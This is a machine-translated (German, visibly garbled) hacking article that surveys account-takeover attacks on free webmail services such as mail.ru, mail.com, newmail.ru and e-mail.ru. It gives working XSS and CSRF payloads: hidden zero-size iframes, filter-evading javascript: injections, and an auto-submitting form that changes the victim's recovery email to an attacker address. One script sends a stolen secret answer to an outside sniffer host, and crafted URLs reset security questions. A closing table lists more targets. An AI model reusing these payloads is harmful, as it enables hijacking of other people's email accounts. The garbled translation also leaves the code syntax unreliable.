This page has been robot translated, sorry for typos if any. Original content here.

ÜBERBLICK ÜBER DIE VULNERABILITY kostenlosen E-Mail-Service

Weiter geht es in Web-Mail zu engagieren. Ich habe einige Nachforschungen über die verschiedenen Dienste für Einbruch- und präsentieren Ihnen die Ergebnisse. Angriffstechnik bleibt das gleiche: das Schreiben der Gegner mit JavaScript-Code an die Adresse gesendet, die ausgelöst wird, wenn eine Nachricht zu öffnen, und alle Informationen in den Boxeinstellungen ändern. Keine Notwendigkeit, im Detail der einzelnen Server zu beschreiben, wie der Ansatz überall gleich ist, so werde ich ein paar Beispiele, und am Ende geben - Tabelle. In den meisten Fällen kann durch Hacking eine 100%, mit einigen Annahmen in Betracht gezogen werden: Der Anwender muss sicher sein, eine Web-basierte Schnittstelle verwenden, um die Buchstaben zu lesen, wenn Exploits schreiben, habe ich auf einer einheitlichen Plattform konzentriert, die zunächst davon ausgehen, dass der Benutzer nicht einige exotische Betriebssystem ist oder Browser mit behinderter JS Umsetzung.

WWW.MAIL.RU

Ich werde mit E-Mail №1 in Russland starten. Im Moment dank der Übertragung von JavaScript-Entwickler, und ein Fehler, das Postfach zu brechen kann durchgeführt werden. Ich glaube, dass die grundlegenden Prinzipien sind gut bekannt. Wie erhalte ich ein Passwort? 1 - nicht autorisierte Änderung es. Nicht passieren, müssen Sie zuvor installiert wissen. 2 - Ihre geheime Frage zu ändern und die Vorteile unseres Kampfes mit Amnesie nehmen. Auch wird nicht funktionieren. 3 - Legen Sie Ihre E-Mail-Alternative, ihm ein neues, vom System generierte Passwort zu erhalten. Es funktioniert nicht, die letzten beiden aforenamed Optionen in der gleichen Form sind und werden auch durch ein Passwort geschützt. Auch der Rest von geringerem Interesse Anpassung für uns (Name, Vorname, etc.) nicht mehr in der Lage sein, ohne zu ändern, das aktuelle Passwort eingeben. Scheinbar keine Optionen. Allerdings gibt es eine geringe Bedeutung, unscheinbarer Konfigurationsabschnitt „Kontaktinformation“ (ICQ, Website, Telefonnummer, Ort der Arbeit, Zeitzone, etc.). In diesem Abschnitt können Sie auch den Kontakt per E-Mail angeben. Der Trick besteht darin, dass in diesem Fall die Registrierungsinformationen alternative Adresse geändert wird, aber eine, die in der Anwendung registriert ist, und Sie haben jetzt das Passwort auf der Seife zu bekommen, mit dem Erinnerungs-Service. Es ist ganz einfach. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Wahr GET - Methode die Einstellungen in der Box mail.ru ändern sind jetzt unmöglich zu machen, so dass ich im Detail die technischen Aspekte beschreiben.

I. Mit Bezug auf die gewünschten Briefkasten mit dem Code, der direkt in dem Körper des Telegramms erzeugen wird, mit Bezug auf unsere Website. Wenn möglich, muss das Skript ohne Benutzerinteraktion ausgelöst werden (klicken Sie auf, klicken Sie auf, bewegen Sie die Maus, um das Bild Laden, etc.):


 <Embed src = "Javascript: document.getElementById ( 'xxx') innerHTML- = '<iframe src = http: //yoursite.yourdomain.ru/yourscript.html> </ iframe>';. This.wav">
 <P id = 'xxx'>
Um sowie Tarnung vollständig die Effizienz des Skripts zu gewährleisten, transformieren:
 <Embed src = „javascript :. Status = Position; document.getElementById ( 'xxx') innerHTML- = '<iframe src = http: //yoursite.ru/yourscript.html width = 0 height = 0> </ iframe>' ; this.wav „width = 0 Höhe = 0>
 <P id = 'xxx'>
Auf diese Weise ersetzen die Zeichencodes, die Buchstaben im Namen des iframe und JavaScript-Elemente, und das Skript Mailing sie nicht filtern. Der Leitungsstatus = Position; Es schafft Transparenz in der Statusleiste des lokalen URL, auf fremde Blinken nicht verdächtig. Attribute Breite und Höhe, als Rahmen und einbetten wird auf Null gesetzt, und sie unsichtbar machen.

II. Auf http://yoursite.ru Ressource stationieren HTML-Dokument Form die geänderten Daten an den Server senden mail.ru.

Inhalt yourscript.html:
 <Form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <Input type = "hidden" name = "page" value = "2"> <br>
 <Input type = "hidden" name = "E-Mail" value = "hacker@antichat.ru"> <br>
 <Input type = "hidden" value = "Speicher" name = "Speicher"> <br>
 </ Form> <br>
 <Script> <br>
 document.anketa.submit (); <br>
 </ Script>
Weitere Informationen: Arbeitsclientseitige Skript unverändert Garantie nur für IE; Form wird auf einer separaten Seite befindet sich speziell auf „Entladen“ den Brief.


WWW.MAIL.COM

Jetzt noch ein paar andere Sicherheitslücke auf http://mail.com Beispiel. Wenn Sie das Kennwort Erinnerung zu verwenden, dann zu erhalten, genügt es, die richtige Antwort auf Ihre geheime Frage (eins) zu gelangen. So haben wir ein Ziel, diese Antwort zu bekommen. Dies ist leicht getan. Wenn ich auf die Mailbox Eigenschaften und prosmatrel Registrierungsinformationen ging, uidel dann, dass die Antwort auf Ihre geheime Frage ist nicht versteckt, dass wir JavaScript verwenden können ihren Wert zu prüfen.

Implementieren Sie das Skript durch den Tag - Stil.
Adresse der Seite mit den Einstellungen: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
Textfeld mit dem Namen der geheimen Antwort: hint_a
Als Ergebnis um Ihre geheime Frage zu stehlen, müssen Sie die Einstellungen Seite aufzurufen, führen Sie JavaScript, um den Wert document.profileform.hint_a.value, zu erhalten und es auf den Sniffer mit der Umgebungsvariablen Umgebung REQUEST_UR I. übergeben

Bereit Option:
 <Style> @import url (javascript: document.getElementById ( 'out') innerHTML- = „<iframe src = http :. //mail01.mail.com/scripts/common/genprofile.cgi name = 'Null' % 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php'; document.zero.location = path + str`> </ iframe>“ ); </ style>
 <Span id = 'out'> </ span>
In dem erzeugten Rahmen genannt Nullast Einstellungsseite. Nach dem Download läuft der OnLoad-Handler ein Skript geheime Frage zu lesen, und dann durch den gleichen Rahmen, sendet eine Antwort an den Sniffer. Nun, gehen Sie einfach auf die Adresse http://zero.h12.ru/stat/log.php, und finden Sie die richtigen Informationen in der „Host“ Zeile.

WWW.NEWMAIL.RU

Meiner Meinung nach, ist sehr beliebt Mailer, so ausführlich darüber sprechen. Vor allem, weil jemand anderes Konto zu übernehmen, auf es viel einfacher, als es auf den ersten Blick scheint. Sie können dies tun: einen Brief mit einem Skript senden , die, wenn sie ausgeführt wird eine Session - ID erhalten, die erforderlichen Untersuchungen bilden, und die Einstellungen Wert altrenativnogo E - Mail ersetzen (die dann das Passwort senden) und eine geheime Frage und Antwort. Wenn jedoch die Erinnerung, um anzuzeigen, andere Adresse, Passwort, und senden Sie es, solange die geheime Antwort richtig war. Und die folgende Beobachtung: Sitzungs - ID - Einstellungen ändern Sie können nie verwenden. Außerdem werden die Tags nicht gestattet. Alle oben genannten verringert die Menge an Code zu einem Paar von Linien:
 <Iframe src = http :? //newmail.ru/users/chpass.dhtml cp_msg = 1 & cp_quest = FRAGE & cp_answ = ANTWORT width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

nicht in das übergreifende Thema des Artikels passen hacken e-mail.ru wenige, aber immer noch - mail :) . Wenn ich brauchte ein Passwort aus einem Feld zu erhalten, registriere ich in der Regel ein Benutzerkonto, und begann das System zu erkunden. Das erste, was mir auffiel - eine Gelegenheit, ein neues Passwort und Sicherheitsfrage ohne Eingabe des alten Passworts zu beantworten einzustellen. Aktionsplan normal: überprüfen Filtertags, eine ID erhalten und die Abfrage ausführen. Um jedoch die Einstellungen zu ändern, verwenden Sie eine spezielle Variable utoken, die im Körper des Dokuments enthalten ist. Nach der Änderung von Frage und Antwort mit bekannten utoken experimentieren:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Ich kam zu Schluss gekommen , dass nicht erforderlich ist die ID und die Einstellungen für Cookies ändern. In diesem Fall wird nach Beobachtung utoken wurde festgestellt , dass die vierstellige Hexadezimalzahl nach email@e-mail.ru-5a00-mail Adresse in einem sehr engen Bereich ist. Das heißt, eine geheime Frage herzustellen , um ein Feld zu uns auf Zinsen zu beantworten, müssen Sie durch alle 7 Optionen gehen: 5a00, 5b00, 5c00, 5d00 , 5e00, 5f00, 6000. Wenn die Zahl erraten wird, werden wir in die richtige Box fallen.

Hinweis: zu diesem Zeitpunkt einige Änderungen gab. Passwort-Recovery-Dienst wird nicht ausgeführt, so ist es ratsam, sie sofort zu ändern. Adressänderung Einstellungen geändert, auch:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Methode funktioniert nevsegda. Wahrscheinlich bedarf noch den Benutzer von Zeit zu Zeit in der Post über das Internet kam.

Tabelle mit Eigenschaften frei WWW-Servern

SERVER JavaScript VULNERABILITY
www.km.ru
km.ru
img src = javascript: Es ermöglicht Ihnen, das Passwort von der Einstellungsseite des Passwortfeldes zu lesen
www.mail.ru
inbox.ru , bk.ru , list.ru ,
embed src = javascript: Sie können die alternative E-Mail ändern
www.mail.com
email.com , post.com , myself.com , consultant.com et al.
@ Import URL (Javascript :); Die Einstellungen werden in der Antwort auf die geheime Frage gezeigt
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
mit allen Mitteln Lesen / Ändern Sie die Frage und Antwort. Kennwort herausragende Leistungen
www.netman.ru und www.mailgate.ru
die gleiche Mailer. 80 Domains
img src = javascript :, style = background: url (Javascript :) Sie können die Antwort auf Ihre geheime Frage stehlen, wenn es installiert ist. Es ist auch möglich ustnovit Nachsendeadresse (eine Kopie wird nicht gespeichert)
www.yandex.ru OnError, OnLoad Löschen einer Website * .narod.ru (JS ist nicht erforderlich)
www.ukr.net embed src = javasc
ript: diese .wav>
Lesen Sie die Antwort auf Ihre geheime Frage
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = „javascript: Ändern / stehlen Ihre geheime Antwort
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru , et al.
vielfach Löschen Ihres Kontos
www.rin.ru embed src = javascript: Lesen Sie die geheime Antwort